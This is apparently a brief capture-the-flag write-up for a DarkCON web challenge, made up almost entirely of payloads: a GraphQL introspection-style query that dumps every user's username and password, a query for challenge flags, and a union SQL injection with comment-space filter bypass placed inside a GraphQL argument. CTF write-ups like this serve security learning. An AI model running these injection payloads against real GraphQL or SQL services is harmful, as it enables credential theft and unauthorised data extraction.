web hacking

DarkCON CTF web Writeup - DarkCON Challs

as3617 2021. 2. 21. 21:49 
1. graphql injection
2. union sql injection

get admin password

{
    allUsers{
        username
        password
    }
}

login - admin:is_this_visible_to_you?

 

{
  Challs{
    id
    title
    description
    category
    author
    points
        flag{
            chall_flag
        }
    }
}

Get Flag using sql injection

{
    hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){
        chall_id
    }
}